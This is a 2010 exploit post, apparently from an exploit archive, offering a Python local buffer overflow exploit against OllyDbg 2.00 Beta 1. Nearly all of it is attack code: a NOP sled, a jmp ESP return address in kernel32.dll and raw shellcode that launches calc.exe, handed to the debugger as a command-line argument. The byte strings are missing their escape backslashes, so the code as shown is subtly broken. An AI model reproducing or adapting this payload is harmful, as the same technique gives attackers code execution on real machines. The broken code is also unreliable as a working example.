ollydb-overflow.txt
Posted on 16 February 2010
Hi, it is possible to overflow ollydbg2 in order to execute an arbitrairy code. Have a quick look below. Bye # Exploit Title: [Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit] # Date: [2010-02-15] # Author: [_SuBz3r0_] # Software Link: [http://www.ollydbg.de/version2.html] # Version: [2.00 Beta 1] # Tested on: [XP SP3] # CVE : [if exists] # Code : #Ollydbg2 v2.00 beta1 Exploit in Python print "" print "##############################################" print "# _SuBz3r0_ #" print "##############################################" print "" print "Ollydbg v2.00 beta 1 local overflow Exploit" print "Just For Fun" print "exploit = [NOP] + [jmp ESP] + [SH3LLC0DE]" print "Shellcode = calc.exe" print "" print "Greetz:piloo le canari & MaX" print "Tested on: French Windows Xp Sp3 fully Patched" print "" import os import sys #path to ollydbg.exe program = 'c:\ollydbg.exe' #exploit = [NOP] + [jmp ESP] + [SH3LLC0DE] #overflow =786*'x90' #eip = "x13x44x87x7c" : kernel32.dll jmp esp #Shellcode pop up calc.exe exploit =786*'x90'+'x13'+'x44'+'x87'+'x7c'+''.join([ 'xb4x31xf8x2dx84xe3x04x35xb8x3cx14x46x34x48', 'x67xfcx31xc9x83xe9xe2xe8xffxffxffxffxc0x5e', 'x81x76x0ex03xf9xd8x37x83xeexfcxe2xf4xffx11', 'x9cx37x03xf9x53x72x3fx72xa4x32x7bxf8x37xbc', 'x4cxe1x53x68x23xf8x33x7ex88xcdx53x36xedxc8', 'x18xaexafx7dx18x43x04x38x12x3ax02x3bx33xc3', 'x38xadxfcx33x76x1cx53x68x27xf8x33x51x88xf5', 'x93xbcx5cxe5xd9xdcx88xe5x53x36xe8x70x84x13', 'x07x3ax87x06xf5x99x8ex53x88xbfxe8xbcx43xf5', 'x53x47x1fx54x53x5fx0bx70x20xb4xc3x93x88x5f', 'xf3x73xdcx68x6bx61x26xbdx0dxaex27xd0x60x98', 'xb4x54x03xf9xd8x37']) print "" os.execl(program,program,program,exploit)